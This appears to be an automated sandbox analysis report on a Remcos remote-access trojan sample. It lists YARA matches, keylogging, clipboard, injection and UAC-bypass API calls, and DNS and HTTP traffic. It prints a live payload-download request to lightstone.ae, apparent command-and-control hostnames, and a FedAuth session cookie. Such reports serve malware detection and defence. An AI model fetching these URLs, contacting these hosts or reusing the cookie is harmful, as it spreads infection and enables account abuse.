FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjEzLDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uI2Q3NzQ2ZGY2NmVlODk4Nzc5MTI0YzAxMTEwNWZkZTJlZTgyZTI3NTUzNGMwNmMyMjBiOWNlZjQyNGMxNzNjMzAsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jZDc3NDZkZjY2ZWU4OTg3NzkxMjRjMDExMTA1ZmRlMmVlODJlMjc1NTM0YzA2YzIyMGI5Y2VmNDI0YzE3M2MzMCwxMzM3NzA3OTAzNDAwMDAwMDAsMCwxMzM3NzE2NTEzNDk3ODEzMTksMC4wLjAuMCwyNTgsOTE3NDIwNjMtZmNjYy00Y2JhLWIzNGItNjliZTU0ZTQ4NGU4LCwsZDE5NzY3YTEtNzBmOS1hMDAwLTcwZGMtNmI4OGUwYmM1NThkLGQxOTc2N2ExLTcwZjktYTAwMC03MGRjLTZiODhlMGJjNTU4ZCxMMEhrZGdUY3pVcTFOaGcwM2VZM2ZRLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxODk3NDksdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGlQNFZYR2cwTkFVRFJwaHJxS0ZTK1ZDM3RFT0dkTnVqeWhZaGRkNm4yMVJqVUxIYjVQUE9QQkY3SkgyczF3cWZtU0RrTWQzanV2My82RzlEWTRrdE9vbzQ0VnAvb085WE1iL2ExSnBJWVBieHFab3Z4bm9tSk5YVWYwK0Vwd3VHU2pzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJc0pMZEk0YlI2MXhFZjhvK242TmJZM0s0VmNXOEJ0Sk5MZzhpZEJIQVdFOVlFZVhKY3pZMk1OQkpHcElMRzcvczFRODVla09MUVVacjA5TmlnOUY4YlIxRi9FN1lQV1NZcmxEeHBjK0hwTVlnYkZ6cEREQjQyQnZBTnRhRUt0MEhTSS9CRElRMXg2Y2VHZ0EyQ29qTkhCOHhoVjJ2TzFOOVltaWdoSDVuZFZuUT09PC9TUD4=
Source: global traffic HTTP traffic detected: GET /image/233_Selebzihtih HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lightstone.ae
Source: global traffic DNS traffic detected: DNS query: alfanar01-my.sharepoint.com
Source: global traffic DNS traffic detected: DNS query: lightstone.ae
Source: global traffic DNS traffic detected: DNS query: pentester0.accesscam.org
Source: global traffic DNS traffic detected: DNS query: archived.zapto.org
Source: global traffic DNS traffic detected: DNS query: honeypotresearchteam.duckdns.org
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: SndVol.exe, colorcpl.exe String found in binary or memory: http://geoplugin.net/json.gp
Source: SndVol.exe, 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: jlPBMMQbXC.exe, Selebzih.PIF.7.dr String found in binary or memory: http://hydros.8k.com
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: jlPBMMQbXC.exe, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1638986421.000000007FB20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.pmail.com
Source: jlPBMMQbXC.exe, 00000000.00000003.1491122017.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1575706420.00000000007CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://alfanar01-my.sharepoint.com/
Source: jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000DA69000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlK
Source: jlPBMMQbXC.exe, 00000000.00000003.1491122017.00000000007E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://alfanar01-my.sharepoint.com/personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1Z
Source: jlPBMMQbXC.exe, 00000000.00000002.1575706420.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1491122017.00000000007E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://alfanar01-my.sharepoint.com:443/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQ
Source: jlPBMMQbXC.exe, 00000000.00000002.1575706420.0000000000834000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lightstone.ae/
Source: jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000DAA3000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000DA69000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://lightstone.ae/image/233_Selebzihtih
Source: jlPBMMQbXC.exe, 00000000.00000002.1575706420.000000000077E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lightstone.ae/image/233_Selebzihtihv
Source: jlPBMMQbXC.exe, 00000000.00000002.1575706420.0000000000802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lightstone.ae:443/image/233_SelebzihtihzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJ
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: jlPBMMQbXC.exe, 00000000.00000003.1491083792.000000000083E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spo.nel.measure.office.net/api/report?tenantId=91742063-fccc-4cba-b34b-69be54e484e8&desusert
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 13.107.136.10:443 -> 192.168.2.9:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.19.139.102:443 -> 192.168.2.9:49746 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2913A2F3 SetWindowsHookExA 0000000D,2913A2DF,00000000 8_2_2913A2F3
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2914697B OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_2914697B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_291468FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_291468FC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 15_2_004168FC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077E7619 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 15_2_077E7619
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2914697B OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_2914697B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2913A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 8_2_2913A41B
Source: Yara match File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR

E-Banking Fraud

barindex
Source: Yara match File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2914CA73 SystemParametersInfoW, 8_2_2914CA73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0041CA73 SystemParametersInfoW, 15_2_0041CA73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077ED790 SystemParametersInfoW, 15_2_077ED790

System Summary

barindex
Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Windows\SysWOW64\SndVol.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6B118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx, 0_2_02C6B118
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C67A2C NtAllocateVirtualMemory, 0_2_02C67A2C
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_02C6DC8C
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02C6DC04
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 0_2_02C6DD70
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C67D78 NtWriteVirtualMemory, 0_2_02C67D78
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C684C8 NtProtectVirtualMemory, 0_2_02C684C8
